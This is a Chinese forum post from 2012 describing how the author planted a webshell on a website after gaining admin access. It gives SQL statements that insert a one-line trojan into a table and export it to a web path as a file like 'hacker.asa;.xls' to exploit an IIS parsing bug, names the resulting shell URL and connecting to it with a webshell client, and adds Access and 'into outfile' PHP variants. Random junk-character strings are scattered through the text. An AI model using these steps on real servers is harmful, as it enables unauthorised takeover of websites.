好不容易进了后台,发现啥上传啊。备份啊多木有。2 Z. }6 q! ?- q: j5 ^! ^
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的3 |; B- _5 ]6 U! C \5 E
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
7 q1 F% N9 j# e# M然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:* a7 V; B. x6 ^7 E$ C
1.create table cmd (a varchar(50))
2 _1 j. \* L3 _2.insert into cmd (a) values (‘‘)9 c7 {) s& y2 L, _4 V# O- \# X( m
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
+ r, D3 H% o6 B) n' [' }(把表cmd的内容导出为物理路径的一个EXCEL文件)
( x4 v4 y, ?/ Y7 q4.drop table cmd, V6 _4 |. W7 d
利用IIS的BUG成功拿到了WEBSHELL。+ k% _9 S9 M9 A
. W1 j, @9 g: Z! P+ y, ]直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
: z! |9 G6 m4 [; b0 H, P' V$ q+ d; v$ ~: j
SQL语句意思解释:
# J7 J1 u0 M5 a! T' Y 第一句4 K2 N. C5 W0 E i4 q: y
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为508 g2 z1 O/ u, G
! i9 u5 F* d) \8 g( G4 P3 R! c5 F 第二句' ~8 m5 S: O1 u( ~8 k
在表cmd的a字段插入一句话木马) |$ Q) W% Z* I- b: W0 |' z
第三句$ V/ p3 g* J: o* T4 O8 i
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件3 ^) v4 P2 {" j$ M; @
, j5 Q* S: ~* t9 d+ b
第四句
& W' `) E9 n& u3 q- T 删除建立的cmd表/ r) Z& J; B1 {3 B3 p7 b: `$ ?$ k, O
% s/ Y) C. g9 i1 ^
以下内容为测试:" ~' s( K7 f d% ~" J
Access利用后台SQL执行命令功能导出WebShell:
6 c) }+ q; L/ ]# t4 k 这个更简单:, c1 K+ @, n- N+ o2 w. ~( Q3 t
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
4 O& E: k7 v, z; d 或者 }- Z( R% X6 j4 @" ^# g
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]* ~( ]4 K8 s8 }) e w* v b
- E: F) b: w% P! h+ M 后台有执行SQL语句功能(vote为已知表段)! ]3 `; n5 g7 G6 l5 g
希望对大家有所帮助拿shell的又一个思路$ X: t. i! D: w
|
发表于 2012-9-13 17:53:58
收藏
支持
反对